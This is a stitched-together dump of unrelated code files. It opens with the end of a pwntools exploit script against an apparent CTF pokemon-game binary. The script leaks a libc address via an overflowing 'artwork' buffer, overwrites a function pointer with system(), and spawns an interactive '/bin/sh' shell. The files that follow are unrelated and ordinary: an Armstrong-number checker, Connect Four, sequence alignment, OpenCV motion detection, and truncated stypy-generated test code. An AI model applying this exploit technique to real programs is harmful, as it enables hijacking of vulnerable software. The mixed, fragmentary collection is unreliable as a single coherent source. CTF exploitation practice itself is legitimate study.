# now catch the charizard (13th encounter); name it /bin/sh so the final
# system() call gets its argument from the name field
catch_poke("/bin/sh")
# replace pokemon 2 with it
r.sendline("2")
r.recvuntil("work\n\n")
# now set artwork: leak _IO_stdin (offset: 0x001a9c20)
# address is something in main that points to stdin
artwork = fit({0x5f4-0xf:p32(0x80492b3), 0x5ec-0xf:p32(1000)}, length=2128)
r.sendline("5")
r.sendline("2")
r.send(artwork)
r.recvuntil("friends!\n")
# now fight a poke, switch to the charizard, leak libc via bird_attack_name
r.recvuntil("work\n\n")
r.sendline("1")
r.recvuntil("Run\n")
r.sendline("4")
r.sendline("2")
r.recvuntil("Run\n")
r.sendline("1")
r.recvuntil("used ")
stdin_addr = u32(r.recvn(4))
libc_base = stdin_addr - 0x001a9c20
log.info("Leaked libc base: " + hex(libc_base))
# now set the kakuna proc to system in the artwork
artwork = fit({0x210-0xf:p32(libc_base + libc.symbols["system"])}, length=2127)
r.recvuntil("work\n\n")
r.sendline("5")
r.sendline("2")
r.send(artwork)
r.recvuntil("work\n\n")
# now inspect to trigger the hijacked function pointer and run system("/bin/sh")
r.sendline("3")
r.interactive()
|
991,612 | 0d5a045ce2a48b6600496115ae582318c6986de2 | a=int(input("enter the number"))
# Armstrong-number check: a equals the sum of its digits, each raised to the
# power of the digit count.
temp = a
a1 = str(a)
b = len(a1)  # number of digits
print(b)
# Renamed from `sum`, which shadowed the builtin; dropped the temp variable `q`.
total = 0
while temp != 0:
    digit = temp % 10
    temp = temp // 10
    total += digit ** b
if a == total:
    print(a, "is an Armstrong number")
else:
    print(a, "is not an Armstrong number")
|
991,613 | 45a40fc7bc07506365ba475d797c78585484306f | class Solution:
def rob(self, nums: List[int]) -> int:
if len(nums) == 0: return 0
memo = [0 for x in range(len(nums))]
memo[0] = nums[0]
for i in range(1, len(nums)):
memo[i] = max(memo[i-1], memo[i-2] + nums[i])
return memo[-1] |
991,614 | 7e6bde91bcddf98329ea24906f5cad1eba53a973 | from random import randint
class Board:
    """ a datatype representing a C4 board
        with an arbitrary number of rows and cols
    """

    def __init__(self, width, height):
        """ the constructor for objects of type Board """
        self.width = width
        self.height = height
        W = self.width
        H = self.height
        # row 0 is the top of the board; ' ' marks an empty cell
        self.data = [[' '] * W for row in range(H)]

    def __repr__(self):
        """ this method returns a string representation
            for an object of type Board
        """
        W = self.width
        H = self.height
        s = ''  # the string to return
        for row in range(0, H):
            s += '|'
            for col in range(0, W):
                s += self.data[row][col] + '|'
            s += '\n'
        s += (2 * W + 1) * '-'  # bottom of the board
        s += '\n'
        # column labels cycle 0-9 so each stays one character wide
        x = -1
        for i in range(W):
            if x == 9:
                x = 0
                s += " " + str(x)
            else:
                x += 1
                s += " " + str(x)
        return s  # the board is complete, return it

    def setBoard(self, moveString):
        """Place alternating 'X'/'O' checkers in the given columns,
        starting with 'X'.  moveString must be a string of integers,
        e.g. b.setBoard('012345') or b.setBoard('000000').
        """
        nextCh = 'X'  # start by playing 'X'
        for colString in moveString:
            col = int(colString)
            # BUG FIX: valid columns are 0..width-1; the old test allowed col == width
            if 0 <= col < self.width:
                self.addMove(col, nextCh)
            if nextCh == 'X':
                nextCh = 'O'
            else:
                nextCh = 'X'

    def addMove(self, col, ox):
        """Drop checker ox into column col (lowest empty row)."""
        for i in range(self.height - 1, -1, -1):
            if self.data[i][col] == ' ':
                self.data[i][col] = ox
                break

    def allowsMove(self, col):
        """Return True if col is in range and not yet full."""
        # BUG FIX: column 0 is legal; the old test `0 < col` rejected it
        if 0 <= col < self.width:
            if self.data[0][col] == ' ':
                return True
        return False

    def isFull(self):
        """Return True when no column accepts another move."""
        # BUG FIX: iterate every column; `(0, self.width)` only checked two values
        for i in range(0, self.width):
            if self.allowsMove(i):
                return False
        return True

    def delMove(self, col):
        """Remove the top checker from column col (undo a move)."""
        for i in range(0, self.height, 1):
            if self.data[i][col] != ' ':
                self.data[i][col] = ' '
                break

    def winsFor(self, ox):
        """Return True if player ox has four in a row in any direction."""
        H = self.height
        W = self.width
        D = self.data
        # check for horizontal wins
        for row in range(0, H):
            for col in range(0, W - 3):
                if D[row][col] == ox and \
                   D[row][col + 1] == ox and \
                   D[row][col + 2] == ox and \
                   D[row][col + 3] == ox:
                    return True
        # vertical wins
        for row in range(0, H - 3):
            for col in range(0, W):
                if D[row][col] == ox and \
                   D[row + 1][col] == ox and \
                   D[row + 2][col] == ox and \
                   D[row + 3][col] == ox:
                    return True
        # down-right diagonal wins
        for i in range(0, H - 3):
            for j in range(0, W - 3):
                if D[i][j] == ox and \
                   D[i + 1][j + 1] == ox and \
                   D[i + 2][j + 2] == ox and \
                   D[i + 3][j + 3] == ox:
                    return True
        # down-left diagonal wins
        for row in range(0, H - 3):
            for col in range(3, W):
                if D[row][col] == ox and \
                   D[row + 1][col - 1] == ox and \
                   D[row + 2][col - 2] == ox and \
                   D[row + 3][col - 3] == ox:
                    return True
        return False

    def hostGame(self, player):
        """Alternate a human 'X' with `player` as 'O' until someone wins."""
        x = True
        v = False
        while v == False:
            if x == True:
                # parenthesized print works on both Python 2 and 3
                print("X's Move")
                c = input(int)  # NOTE(review): Python-2-style prompt/eval; verify intended
                if self.allowsMove(c):
                    self.addMove(c, 'X')
                    v = self.winsFor('X')
                    x = False
            if x == False:
                print("O's Move")
                c = player.tiebreakMove(self)
                if self.allowsMove(c):
                    self.addMove(c, 'O')
                    v = self.winsFor('O')
                    x = True
            print(self)
class Player:
    """An automated Connect-Four player: scores each column, avoids
    immediate losses (foresight), and breaks ties by self.tbt.
    """

    def __init__(self, ox, tbt, ply):
        """ox: this player's checker ('X' or 'O'); tbt: tiebreak type
        ('LEFT', 'RIGHT' or random); ply: lookahead depth (kept for interface).
        """
        self.ox = ox
        self.tbt = tbt
        self.ply = ply

    def __repr__(self):
        """ creates an appropriate string """
        s = "Player for " + self.ox + "\n"
        s += " with tiebreak type: " + self.tbt + "\n"
        s += " and ply == " + str(self.ply) + "\n\n"
        return s

    def opp(self):
        """Return the opponent's checker."""
        if self.ox == 'X':
            return 'O'
        elif self.ox == 'O':
            return 'X'

    def scoreBoard(self, Board):
        """Score a board from self's perspective: 100 win, 0 loss, 1 full/draw, 50 otherwise."""
        z = self.opp()
        if Board.winsFor(self.ox) == True:
            return 100
        elif Board.winsFor(z) == True:
            return 0
        elif Board.isFull() == True:
            return 1
        else:
            return 50

    def findScore(self, Board):
        """Return one score per column for a trial move by self.

        BUG FIX: the old version aliased the board and never removed the
        trial moves, permanently mutating the shared game state; each
        trial move is now undone with delMove.
        """
        scores = []
        for Col in range(0, Board.width):
            if Board.allowsMove(Col):
                Board.addMove(Col, self.ox)
                scores.append(self.scoreBoard(Board))
                Board.delMove(Col)
            else:
                scores.append(-1)  # full column: below 0, never selected
        return scores

    def highScores(self, scores, board):
        """Return the indices of the best-scoring columns that pass foresight."""
        k = []
        b = 0
        for i in range(0, len(scores)):
            if scores[i] > b and self.foresight(board, i):
                b = scores[i]
                k = []
                k.append(i)
            elif scores[i] == b and self.foresight(board, i):
                k.append(i)
        return k

    def tiebreakMove(self, board):
        """Pick one column among the best according to the tiebreak type."""
        scores = self.findScore(board)
        high = self.highScores(scores, board)
        q = len(high) - 1
        if self.tbt == 'LEFT':
            return high[0]
        elif self.tbt == 'RIGHT':
            return high[q]
        else:
            return high[randint(0, q)]

    # checks to see if move will lead to an immediate loss
    def foresight(self, board, c):
        """Return False if moving in column c lets the opponent win next turn.

        BUG FIX: the old version called addMove with the wrong argument count
        on a None value and constructed a bogus Board(0, 0), so it raised at
        runtime; trial moves are now played on `board` and undone afterwards.
        """
        if not board.allowsMove(c):
            return True
        board.addMove(c, self.ox)
        safe = True
        for i in range(0, board.width):
            if board.allowsMove(i):
                board.addMove(i, self.opp())
                if board.winsFor(self.opp()):
                    safe = False
                board.delMove(i)
                if not safe:
                    break
        board.delMove(c)
        return safe

    def nextMove(self, board):
        """Delegate to tiebreakMove."""
        return self.tiebreakMove(board)
|
991,615 | 1b33580bdf91373cb33e760928618b529bccbf19 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 25 00:21:12 2018
@author: Kazuki
"""
import pandas as pd
def _load_importance(path):
    """Read a feature-importance CSV, min-max scale the 'split' and
    'gain' columns, combine them into 'total', sort by 'total'
    descending, and index the frame by 'feature'."""
    imp = pd.read_csv(path)
    imp['split'] /= imp['split'].max()
    imp['gain'] /= imp['gain'].max()
    imp['total'] = imp['split'] + imp['gain']
    imp.sort_values('total', ascending=False, inplace=True)
    imp.set_index('feature', inplace=True)
    return imp


# NOTE(review): hard-coded local paths — throwaway analysis script.
# The identical load/normalize/sort sequence was previously duplicated
# inline for both files; it is factored into _load_importance above.
imp_2 = _load_importance('/Users/Kazuki/Downloads/imp_801_imp_lgb_onlyMe.py-2 (2) 0.08.51.csv')
imp_3 = _load_importance('/Users/Kazuki/Downloads/imp_801_imp_lgb_onlyMe.py-2 (3).csv')

# Rank features by combined importance in each run and measure how far
# each feature moved between the two runs.
imp = imp_2.total.rank(ascending=False).to_frame()
imp['total3'] = imp_3.total.rank(ascending=False)
imp['diff'] = abs(imp.total - imp.total3)

# Features inside the top 700 of run 2 but outside the top 700 of run 3.
imp_ = imp[imp.total<=700]
imp_ = imp_[imp_.total3>700]
|
991,616 | f19653a5fc1ecf6d5c3b258efd6fc1ce3ea885e6 | #!/usr/bin/python3
import sys
import re
# AB BA CD BA
# CD DC AB DC
# CA AC DB BD
# DB BD CA AC
# Each pattern has 8 patterns
# Rotate 90° or not, flip X or not, flip Y or not
# 2³=8
class Tile:
    """One square image tile from the puzzle input.

    Each of the four borders is encoded as an integer by reading the
    border's '.'/'#' characters as a binary number ('.'→0, '#'→1).
    `edges` is ordered [top, right, bottom, left].
    """

    # BUG FIX: previously a plain namespace-level function — it only
    # worked when accessed through the class; @staticmethod makes
    # `self._parse_line(...)` safe too and states the intent.
    @staticmethod
    def _parse_line(line):
        return int(line.replace('.', '0').replace('#', '1'), 2)

    def __init__(self, id, lines):
        self.id = id
        self.edges = [
            # Top
            Tile._parse_line(lines[0]),
            # Right (last character of every row, top to bottom)
            Tile._parse_line(''.join(x[-1] for x in lines)),
            # Bottom
            Tile._parse_line(lines[-1]),
            # Left (first character of every row, top to bottom)
            Tile._parse_line(''.join(x[0] for x in lines))
        ]
def get_tiles(lines):
    """Yield a Tile for each 'Tile <id>:' header + grid block in `lines`.

    Blocks are separated by blank lines; trailing whitespace on each
    line is ignored.
    """
    num = None
    grid = []
    for line in lines:
        line = line.rstrip()
        if num is None:
            num = int(re.match(r'Tile ([0-9]+):$', line).group(1))
        elif len(line) == 0:
            yield Tile(num, grid)
            num = None
            # Safe to reuse the list: Tile stores parsed edge ints,
            # not a reference to `grid`.
            grid.clear()
        else:
            grid.append(line)
    # BUG FIX: input that does not end with a blank line used to drop
    # the final tile silently; flush it here.
    if num is not None and grid:
        yield Tile(num, grid)
# Smoke check: parse only the first tile from stdin and dump its four
# edge values in binary.
for x in next(get_tiles(sys.stdin)).edges:
    print(bin(x))
|
991,617 | a5dbde761cfc4763634c73997043fd9cc9085468 | import numpy as np
def score(a, b):
    """Substitution score: +1 for a match, -1 for a mismatch."""
    if a == b:
        return 1
    else:
        return -1


def build_nw_matrix(seq1, seq2, gap=-1):
    """Fill and return the Needleman-Wunsch global-alignment DP matrix.

    matrix[i][j] is the best score aligning seq2[:i] against seq1[:j]
    (rows index seq2, columns index seq1); `gap` is the linear gap
    penalty per inserted/deleted character.
    """
    matrix = np.zeros((len(seq2) + 1, len(seq1) + 1))
    # Base cases: aligning a prefix against the empty string costs
    # one gap per character.
    for i in range(len(seq2) + 1):
        matrix[i][0] = gap * i
    for j in range(len(seq1) + 1):
        matrix[0][j] = gap * j
    # Recurrence: best of diagonal (match/mismatch), up (deletion),
    # left (insertion).
    for i in range(1, len(seq2) + 1):
        for j in range(1, len(seq1) + 1):
            match = matrix[i - 1][j - 1] + score(seq1[j - 1], seq2[i - 1])
            deletion = matrix[i - 1][j] + gap
            insertion = matrix[i][j - 1] + gap
            matrix[i][j] = max(match, deletion, insertion)
    return matrix


gap = -1  # linear gap penalty

seq1 = "ATTACA"
seq2 = "ATGCT"
matrix = build_nw_matrix(seq1, seq2, gap)
print(matrix)
991,618 | 8a5f41e1f7a7da5a9202cbf2e99b571c9c099e6f | import cv2
import argparse
import numpy as np
# The test video is opened twice: `capt` drives the frame-differencing
# loop, `capture` (opened below from --input) feeds the
# background-subtractor view.
capt = cv2.VideoCapture('test.mp4')
frame_width = int(capt.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(capt.get(cv2.CAP_PROP_FRAME_HEIGHT))

# Command-line options for the background subtraction.
parser = argparse.ArgumentParser(description='Movement Detector.')
parser.add_argument('--input', type=str, help='Caminho para o vídeo.', default='test.mp4')
parser.add_argument('--algo', type=str, help='Método da subtração de fundo.', default='MOG2')
args = parser.parse_args()

# Choose the background-subtraction method.
if args.algo == 'MOG2':
    bS = cv2.createBackgroundSubtractorMOG2()  # Gaussian-mixture segmentation
else:
    bS = cv2.createBackgroundSubtractorKNN()  # nearest-neighbour

capture = cv2.VideoCapture(cv2.samples.findFileOrKeep(args.input))
ret, quadro1 = capt.read()
print(quadro1.shape)

while capt.isOpened():
    ret, quadro = capture.read()
    if quadro is None:
        break
    bw = bS.apply(quadro)
    # Frame counter overlay (white box, black text).
    cv2.rectangle(quadro, (10, 2), (100, 20), (255, 255, 255), -1)
    cv2.putText(quadro, str(capture.get(cv2.CAP_PROP_POS_FRAMES)), (15, 15),
                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))
    # Frame differencing: threshold the blurred grayscale difference
    # between consecutive frames, then dilate to merge nearby regions.
    diff = cv2.absdiff(quadro1, quadro)
    gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
    blur = cv2.GaussianBlur(gray, (5, 5), 0)
    _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
    dilated = cv2.dilate(thresh, None, iterations=3)
    contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Draw a bounding box around each sufficiently large moving region.
    for contour in contours:
        (x, y, w, h) = cv2.boundingRect(contour)
        if cv2.contourArea(contour) < 900:
            continue
        cv2.rectangle(quadro1, (x, y), (x + w, y + h), (0, 255, 0), 2)
    cv2.imshow("Movement Detection", quadro1)
    cv2.imshow('Background', bw)
    quadro1 = quadro
    # NOTE(review): this extra read from `capt` discards a frame and is
    # never used; kept to preserve the original frame pacing.
    ret, quadro = capt.read()
    keyboard = cv2.waitKey(30)
    # BUG FIX: cv2.waitKey returns an int key code, so the original
    # comparison `keyboard == 'q'` could never be true. Mask to 8 bits
    # and compare against ord('q'); 27 is ESC.
    if keyboard & 0xFF == ord('q') or keyboard == 27:
        break
|
991,619 | 50005677fd04d15701563a69a9d29b5b1074d466 |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: from __future__ import division, print_function, absolute_import
2:
3: import numpy as np
4: from numpy.testing import assert_array_almost_equal, assert_
5: from scipy.sparse import csr_matrix
6:
7:
8: def _check_csr_rowslice(i, sl, X, Xcsr):
9: np_slice = X[i, sl]
10: csr_slice = Xcsr[i, sl]
11: assert_array_almost_equal(np_slice, csr_slice.toarray()[0])
12: assert_(type(csr_slice) is csr_matrix)
13:
14:
15: def test_csr_rowslice():
16: N = 10
17: np.random.seed(0)
18: X = np.random.random((N, N))
19: X[X > 0.7] = 0
20: Xcsr = csr_matrix(X)
21:
22: slices = [slice(None, None, None),
23: slice(None, None, -1),
24: slice(1, -2, 2),
25: slice(-2, 1, -2)]
26:
27: for i in range(N):
28: for sl in slices:
29: _check_csr_rowslice(i, sl, X, Xcsr)
30:
31:
32: def test_csr_getrow():
33: N = 10
34: np.random.seed(0)
35: X = np.random.random((N, N))
36: X[X > 0.7] = 0
37: Xcsr = csr_matrix(X)
38:
39: for i in range(N):
40: arr_row = X[i:i + 1, :]
41: csr_row = Xcsr.getrow(i)
42:
43: assert_array_almost_equal(arr_row, csr_row.toarray())
44: assert_(type(csr_row) is csr_matrix)
45:
46:
47: def test_csr_getcol():
48: N = 10
49: np.random.seed(0)
50: X = np.random.random((N, N))
51: X[X > 0.7] = 0
52: Xcsr = csr_matrix(X)
53:
54: for i in range(N):
55: arr_col = X[:, i:i + 1]
56: csr_col = Xcsr.getcol(i)
57:
58: assert_array_almost_equal(arr_col, csr_col.toarray())
59: assert_(type(csr_col) is csr_matrix)
60:
61:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 3, 0))
# 'import numpy' statement (line 3)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/sparse/tests/')
import_459657 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'numpy')
if (type(import_459657) is not StypyTypeError):
if (import_459657 != 'pyd_module'):
__import__(import_459657)
sys_modules_459658 = sys.modules[import_459657]
import_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'np', sys_modules_459658.module_type_store, module_type_store)
else:
import numpy as np
import_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'np', numpy, module_type_store)
else:
# Assigning a type to the variable 'numpy' (line 3)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 3, 0), 'numpy', import_459657)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/sparse/tests/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 4, 0))
# 'from numpy.testing import assert_array_almost_equal, assert_' statement (line 4)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/sparse/tests/')
import_459659 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing')
if (type(import_459659) is not StypyTypeError):
if (import_459659 != 'pyd_module'):
__import__(import_459659)
sys_modules_459660 = sys.modules[import_459659]
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing', sys_modules_459660.module_type_store, module_type_store, ['assert_array_almost_equal', 'assert_'])
nest_module(stypy.reporting.localization.Localization(__file__, 4, 0), __file__, sys_modules_459660, sys_modules_459660.module_type_store, module_type_store)
else:
from numpy.testing import assert_array_almost_equal, assert_
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing', None, module_type_store, ['assert_array_almost_equal', 'assert_'], [assert_array_almost_equal, assert_])
else:
# Assigning a type to the variable 'numpy.testing' (line 4)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 4, 0), 'numpy.testing', import_459659)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/sparse/tests/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 5, 0))
# 'from scipy.sparse import csr_matrix' statement (line 5)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/sparse/tests/')
import_459661 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse')
if (type(import_459661) is not StypyTypeError):
if (import_459661 != 'pyd_module'):
__import__(import_459661)
sys_modules_459662 = sys.modules[import_459661]
import_from_module(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse', sys_modules_459662.module_type_store, module_type_store, ['csr_matrix'])
nest_module(stypy.reporting.localization.Localization(__file__, 5, 0), __file__, sys_modules_459662, sys_modules_459662.module_type_store, module_type_store)
else:
from scipy.sparse import csr_matrix
import_from_module(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse', None, module_type_store, ['csr_matrix'], [csr_matrix])
else:
# Assigning a type to the variable 'scipy.sparse' (line 5)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 5, 0), 'scipy.sparse', import_459661)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/sparse/tests/')
# Machine-generated by stypy: type-inference shadow of the original
# `_check_csr_rowslice(i, sl, X, Xcsr)` (see docstring at top of file).
# Do not edit the generated statements by hand.
@norecursion
def _check_csr_rowslice(localization, *varargs, **kwargs):
    """Type-inference stand-in for `_check_csr_rowslice(i, sl, X, Xcsr)`:
    records the types produced by X[i, sl], Xcsr[i, sl] and the two
    assertion calls in the module type store."""
    global module_type_store
    # Assign values to the parameters with defaults
    defaults = []
    # Create a new context for function '_check_csr_rowslice'
    module_type_store = module_type_store.open_function_context('_check_csr_rowslice', 8, 0, False)
    # Passed parameters checking function
    _check_csr_rowslice.stypy_localization = localization
    _check_csr_rowslice.stypy_type_of_self = None
    _check_csr_rowslice.stypy_type_store = module_type_store
    _check_csr_rowslice.stypy_function_name = '_check_csr_rowslice'
    _check_csr_rowslice.stypy_param_names_list = ['i', 'sl', 'X', 'Xcsr']
    _check_csr_rowslice.stypy_varargs_param_name = None
    _check_csr_rowslice.stypy_kwargs_param_name = None
    _check_csr_rowslice.stypy_call_defaults = defaults
    _check_csr_rowslice.stypy_call_varargs = varargs
    _check_csr_rowslice.stypy_call_kwargs = kwargs
    arguments = process_argument_values(localization, None, module_type_store, '_check_csr_rowslice', ['i', 'sl', 'X', 'Xcsr'], None, None, defaults, varargs, kwargs)
    if is_error_type(arguments):
        # Destroy the current context
        module_type_store = module_type_store.close_function_context()
        return arguments
    # Initialize method data
    init_call_information(module_type_store, '_check_csr_rowslice', localization, ['i', 'sl', 'X', 'Xcsr'], arguments)
    # Default return type storage variable (SSA)
    # Assigning a type to the variable 'stypy_return_type'
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
    # ################# Begin of '_check_csr_rowslice(...)' code ##################
    # Assigning a Subscript to a Name (line 9):
    # Obtaining the type of the subscript
    # Obtaining an instance of the builtin type 'tuple' (line 9)
    tuple_459663 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 9, 17), 'tuple')
    # Adding type elements to the builtin type 'tuple' instance (line 9)
    # Adding element type (line 9)
    # Getting the type of 'i' (line 9)
    i_459664 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 17), 'i')
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 9, 17), tuple_459663, i_459664)
    # Adding element type (line 9)
    # Getting the type of 'sl' (line 9)
    sl_459665 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 20), 'sl')
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 9, 17), tuple_459663, sl_459665)
    # Getting the type of 'X' (line 9)
    X_459666 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 15), 'X')
    # Obtaining the member '__getitem__' of a type (line 9)
    getitem___459667 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 9, 15), X_459666, '__getitem__')
    # Calling the subscript (__getitem__) to obtain the elements type (line 9)
    subscript_call_result_459668 = invoke(stypy.reporting.localization.Localization(__file__, 9, 15), getitem___459667, tuple_459663)
    # Assigning a type to the variable 'np_slice' (line 9)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 9, 4), 'np_slice', subscript_call_result_459668)
    # Assigning a Subscript to a Name (line 10):
    # Obtaining the type of the subscript
    # Obtaining an instance of the builtin type 'tuple' (line 10)
    tuple_459669 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 10, 21), 'tuple')
    # Adding type elements to the builtin type 'tuple' instance (line 10)
    # Adding element type (line 10)
    # Getting the type of 'i' (line 10)
    i_459670 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 10, 21), 'i')
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 10, 21), tuple_459669, i_459670)
    # Adding element type (line 10)
    # Getting the type of 'sl' (line 10)
    sl_459671 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 10, 24), 'sl')
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 10, 21), tuple_459669, sl_459671)
    # Getting the type of 'Xcsr' (line 10)
    Xcsr_459672 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 10, 16), 'Xcsr')
    # Obtaining the member '__getitem__' of a type (line 10)
    getitem___459673 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 10, 16), Xcsr_459672, '__getitem__')
    # Calling the subscript (__getitem__) to obtain the elements type (line 10)
    subscript_call_result_459674 = invoke(stypy.reporting.localization.Localization(__file__, 10, 16), getitem___459673, tuple_459669)
    # Assigning a type to the variable 'csr_slice' (line 10)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 10, 4), 'csr_slice', subscript_call_result_459674)
    # Call to assert_array_almost_equal(...): (line 11)
    # Processing the call arguments (line 11)
    # Getting the type of 'np_slice' (line 11)
    np_slice_459676 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 30), 'np_slice', False)
    # Obtaining the type of the subscript
    int_459677 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 11, 60), 'int')
    # Call to toarray(...): (line 11)
    # Processing the call keyword arguments (line 11)
    kwargs_459680 = {}
    # Getting the type of 'csr_slice' (line 11)
    csr_slice_459678 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 40), 'csr_slice', False)
    # Obtaining the member 'toarray' of a type (line 11)
    toarray_459679 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 11, 40), csr_slice_459678, 'toarray')
    # Calling toarray(args, kwargs) (line 11)
    toarray_call_result_459681 = invoke(stypy.reporting.localization.Localization(__file__, 11, 40), toarray_459679, *[], **kwargs_459680)
    # Obtaining the member '__getitem__' of a type (line 11)
    getitem___459682 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 11, 40), toarray_call_result_459681, '__getitem__')
    # Calling the subscript (__getitem__) to obtain the elements type (line 11)
    subscript_call_result_459683 = invoke(stypy.reporting.localization.Localization(__file__, 11, 40), getitem___459682, int_459677)
    # Processing the call keyword arguments (line 11)
    kwargs_459684 = {}
    # Getting the type of 'assert_array_almost_equal' (line 11)
    assert_array_almost_equal_459675 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 4), 'assert_array_almost_equal', False)
    # Calling assert_array_almost_equal(args, kwargs) (line 11)
    assert_array_almost_equal_call_result_459685 = invoke(stypy.reporting.localization.Localization(__file__, 11, 4), assert_array_almost_equal_459675, *[np_slice_459676, subscript_call_result_459683], **kwargs_459684)
    # Call to assert_(...): (line 12)
    # Processing the call arguments (line 12)
    # Call to type(...): (line 12)
    # Processing the call arguments (line 12)
    # Getting the type of 'csr_slice' (line 12)
    csr_slice_459688 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 17), 'csr_slice', False)
    # Processing the call keyword arguments (line 12)
    kwargs_459689 = {}
    # Getting the type of 'type' (line 12)
    type_459687 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 12), 'type', False)
    # Calling type(args, kwargs) (line 12)
    type_call_result_459690 = invoke(stypy.reporting.localization.Localization(__file__, 12, 12), type_459687, *[csr_slice_459688], **kwargs_459689)
    # Getting the type of 'csr_matrix' (line 12)
    csr_matrix_459691 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 31), 'csr_matrix', False)
    # Applying the binary operator 'is' (line 12)
    result_is__459692 = python_operator(stypy.reporting.localization.Localization(__file__, 12, 12), 'is', type_call_result_459690, csr_matrix_459691)
    # Processing the call keyword arguments (line 12)
    kwargs_459693 = {}
    # Getting the type of 'assert_' (line 12)
    assert__459686 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 4), 'assert_', False)
    # Calling assert_(args, kwargs) (line 12)
    assert__call_result_459694 = invoke(stypy.reporting.localization.Localization(__file__, 12, 4), assert__459686, *[result_is__459692], **kwargs_459693)
    # ################# End of '_check_csr_rowslice(...)' code ##################
    # Teardown call information
    teardown_call_information(localization, arguments)
    # Storing the return type of function '_check_csr_rowslice' in the type store
    # Getting the type of 'stypy_return_type' (line 8)
    stypy_return_type_459695 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 8, 0), 'stypy_return_type')
    module_type_store.store_return_type_of_current_context(stypy_return_type_459695)
    # Destroy the current context
    module_type_store = module_type_store.close_function_context()
    # Return type of the function '_check_csr_rowslice'
    return stypy_return_type_459695

# Assigning a type to the variable '_check_csr_rowslice' (line 8)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 8, 0), '_check_csr_rowslice', _check_csr_rowslice)
# Machine-generated by stypy: type-inference shadow of the original
# `test_csr_rowslice()` (see docstring at top of file).
# Do not edit the generated statements by hand.
@norecursion
def test_csr_rowslice(localization, *varargs, **kwargs):
    """Type-inference stand-in for `test_csr_rowslice()`: records the
    types of N, X, Xcsr and the slice list, then replays the nested
    for-loops over `_check_csr_rowslice` as SSA contexts."""
    global module_type_store
    # Assign values to the parameters with defaults
    defaults = []
    # Create a new context for function 'test_csr_rowslice'
    module_type_store = module_type_store.open_function_context('test_csr_rowslice', 15, 0, False)
    # Passed parameters checking function
    test_csr_rowslice.stypy_localization = localization
    test_csr_rowslice.stypy_type_of_self = None
    test_csr_rowslice.stypy_type_store = module_type_store
    test_csr_rowslice.stypy_function_name = 'test_csr_rowslice'
    test_csr_rowslice.stypy_param_names_list = []
    test_csr_rowslice.stypy_varargs_param_name = None
    test_csr_rowslice.stypy_kwargs_param_name = None
    test_csr_rowslice.stypy_call_defaults = defaults
    test_csr_rowslice.stypy_call_varargs = varargs
    test_csr_rowslice.stypy_call_kwargs = kwargs
    arguments = process_argument_values(localization, None, module_type_store, 'test_csr_rowslice', [], None, None, defaults, varargs, kwargs)
